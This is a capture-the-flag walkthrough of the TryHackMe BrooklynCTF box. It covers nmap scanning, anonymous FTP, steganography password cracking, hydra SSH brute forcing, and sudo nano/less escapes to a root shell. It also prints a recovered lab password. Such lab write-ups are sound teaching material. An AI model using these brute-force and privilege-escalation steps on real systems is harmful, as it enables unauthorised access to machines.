CTF-Writeups/TryHackMe/BrooklynCTF.md

163 lines
5.4 KiB
Markdown
Raw Normal View History

2020-08-28 13:44:42 +00:00
# TryHackMe-BrooklynCTF
Abdullah Rizwan, 25 August , 09:15 PM
BrooklynCTF is a beginner level anyone can try to hack this box. There are two main intended ways to root the box.
## NMAP
```
nmap -sC -sV 10.10.182.198
```
```
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-25 21:16 EDT
Stats: 0:00:15 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 99.99% done; ETC: 21:16 (0:00:00 remaining)
Nmap scan report for 10.10.182.198
Host is up (0.16s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 119 May 17 23:17 note_to_jake.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.8.94.60
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 16:7f:2f:fe:0f:ba:98:77:7d:6d:3e:b6:25:72:c6:a3 (RSA)
| 256 2e:3b:61:59:4b:c4:29:b5:e8:58:39:6f:6f:e9:9b:ee (ECDSA)
|_ 256 ab:16:2e:79:20:3c:9b:0a:01:9c:8c:44:26:01:58:04 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.96 seconds
```
There are 3 ports open on this box.Lets first visit the webpage.
## PORT 80
<a href="https://imgur.com/gXJz19O"><img src="https://i.imgur.com/gXJz19O.png" title="source: imgur.com" /></a>
<a href="https://imgur.com/HmjZ1iK"><img src="https://i.imgur.com/HmjZ1iK.png" title="source: imgur.com" /></a>
When we look at the source of this page it says something about steganography so that image has something hidden with it.
## PORT 21
<a href="https://imgur.com/sNTPWsN"><img src="https://i.imgur.com/sNTPWsN.png" title="source: imgur.com" /></a>
Since ftp is open we can connect to using the username "anonymous" with no password to be provided and we can download a file named "note_to_jake".
<a href="https://imgur.com/wwNH0TH"><img src="https://i.imgur.com/wwNH0TH.png" title="source: imgur.com" /></a>
So we know that there is a user named "jake".
## Steganography
We saw a hidden message towards steganography so now lets try to extract data from image.
<a href="https://imgur.com/qspdhaP"><img src="https://i.imgur.com/qspdhaP.png" title="source: imgur.com" /></a>
If we try to extract data from image it's going to ask for a password so we have to crack it using "stegcracker" which can be installed from here
https://github.com/Paradoxis/StegCracker.
<a href="https://imgur.com/ShNAWPL"><img src="https://i.imgur.com/ShNAWPL.png" title="source: imgur.com" /></a>
<a href="https://imgur.com/ShNAWPL"><img src="https://i.imgur.com/ShNAWPL.png" title="source: imgur.com" /></a>
## PORT 22
As we have found that there are two users "jake" and "holt" in order to find out jake's password we can bruteforce ssh using hydra
```
hydra -l jake -P /usr/share/wordlists/rockyou.txt -t 16 10.10.182.198 ssh
```
<a href="https://imgur.com/p3YTZ48"><img src="https://i.imgur.com/p3YTZ48.png" title="source: imgur.com" /></a>
For simplicity lets make a variable for the box's IP
```
export IP=10.10.182.198
```
<a href="https://imgur.com/NNPCW29"><img src="https://i.imgur.com/NNPCW29.png" title="source: imgur.com" /></a>
<a href="https://imgur.com/OSQMIBE"><img src="https://i.imgur.com/OSQMIBE.png" title="source: imgur.com" /></a>
We can now use "less" command in order to view files.
## Privilege Escalation (Holt)
In order to completely own the box through Holt we have sudo rights for "nano".
The password that we got from extracting information from the image can be utilized here
Login as "holt" from ssh using password "fluffydog12@ninenine".
<a href="https://imgur.com/NNPCW29"><img src="https://i.imgur.com/NNPCW29.png" title="source: imgur.com" /></a>
```
holt@brookly_nine_nine:~$ sudo -l
Matching Defaults entries for holt on brookly_nine_nine:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User holt may run the following commands on brookly_nine_nine:
(ALL) NOPASSWD: /bin/nano
holt@brookly_nine_nine:~$
```
Visit GTFOBIN for escalating privileges
```
sudo nano
```
```
^R^X
```
```
reset; sh 1>&0 2>&0
```
<a href="https://imgur.com/tHylRoZ"><img src="https://i.imgur.com/tHylRoZ.png" title="source: imgur.com" /></a>
As soon as you'll hit enter you will be "root".
<a href="https://imgur.com/0K4C4zl"><img src="https://i.imgur.com/0K4C4zl.png" title="source: imgur.com" /></a>
## Privilege Escalation (Jake)
Login as jake through ssh after you got his credentials through bruteforce or you can switch between usesr.
```
su - jake
password:
```
<a href="https://imgur.com/OSQMIBE"><img src="https://i.imgur.com/OSQMIBE.png" title="source: imgur.com" /></a>
```
sudo less /etc/profile
```
```
!/bin/sh
```
<a href="https://imgur.com/1Fkjhyn"><img src="https://i.imgur.com/1Fkjhyn.png" title="source: imgur.com" /></a>